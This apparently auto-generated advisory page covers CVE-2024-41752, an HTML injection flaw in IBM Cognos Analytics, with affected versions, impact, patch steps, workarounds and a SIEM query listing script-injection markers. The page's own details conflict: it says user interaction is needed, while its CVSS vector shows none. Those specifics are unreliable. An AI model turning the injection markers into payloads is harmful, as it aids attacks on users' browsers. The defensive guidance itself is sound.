CVE-2024-41752 – IBM Cognos Analytics is vulnerable to HTML inje... (How to Fix)

Q: What is the severity of CVE-2024-41752?

CVE-2024-41752 has a CVSS score of 5.4 (MEDIUM). IBM Cognos Analytics is vulnerable to HTML injection where attackers can inject malicious HTML that executes in victims' browsers. This affects IBM Cognos Analytics versions 11.2.0-11.2.4 and 12.0.0-12.0.3, potentially allowing session hijacking, phishing, or data theft.

📋 TL;DR

IBM Cognos Analytics is vulnerable to HTML injection where attackers can inject malicious HTML that executes in victims' browsers. This affects IBM Cognos Analytics versions 11.2.0-11.2.4 and 12.0.0-12.0.3, potentially allowing session hijacking, phishing, or data theft.

💻 Affected Systems

Products:

IBM Cognos Analytics

Versions: 11.2.0 through 11.2.4 and 12.0.0 through 12.0.3

Operating Systems: All supported platforms

Default Config Vulnerable: ⚠️ Yes

Notes: All deployments within affected version ranges are vulnerable regardless of configuration.

📦 What is this software?

Cognos Analytics by Ibm

View all CVEs affecting Cognos Analytics →

Cognos Analytics by Ibm

View all CVEs affecting Cognos Analytics →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete account takeover via session hijacking, credential theft through phishing, or malware delivery to authenticated users.

🟠

Likely Case

Session hijacking leading to unauthorized access to business intelligence data, or phishing attacks against authenticated users.

🟢

If Mitigated

Limited to defacement or minor data exposure if input validation and output encoding are properly implemented.

🌐 Internet-Facing: HIGH

🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ✅ No

Weaponized: UNKNOWN

Unauthenticated Exploit: ✅ No

Complexity: LOW

Exploitation requires user interaction (viewing malicious content) but HTML injection techniques are well-understood.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Apply IBM security bulletin fixes for affected versions

Vendor Advisory: https://www.ibm.com/support/pages/node/7177223

Restart Required: Yes

Instructions:

1. Review IBM security bulletin 2. Apply appropriate fix pack or interim fix 3. Restart Cognos services 4. Verify fix implementation

🔧 Temporary Workarounds

Input Validation Enhancement

all

Implement strict input validation and output encoding for all user-supplied content

Content Security Policy

all

Implement strict Content-Security-Policy headers to limit script execution

🧯 If You Can't Patch

Implement web application firewall (WAF) rules to detect and block HTML injection attempts
Restrict access to Cognos Analytics to trusted networks only and implement network segmentation

🔍 How to Verify

Check if Vulnerable:

Check Cognos Analytics version against affected ranges: 11.2.0-11.2.4 or 12.0.0-12.0.3

Check Version:

Check Cognos Configuration or Administration console for version information

Verify Fix Applied:

Verify applied fix pack version matches or exceeds IBM's security bulletin recommendations

📡 Detection & Monitoring

Log Indicators:

Unusual HTML/script content in user inputs
Multiple failed injection attempts

Network Indicators:

HTTP requests containing suspicious HTML/script patterns

SIEM Query:

source="cognos" AND ("<script" OR "javascript:" OR "onload=" OR "onerror=")

📊 Metadata

CVE ID: CVE-2024-41752

CVSS v3 Score: 5.4 (MEDIUM)

CVSS Vector: CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

CWE: CWE-80

Published: December 18, 2024

Last Updated: January 10, 2025

🔗 References

https://www.ibm.com/support/pages/node/7177223 Vendor Advisory

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2024-41752, you might also want to check these: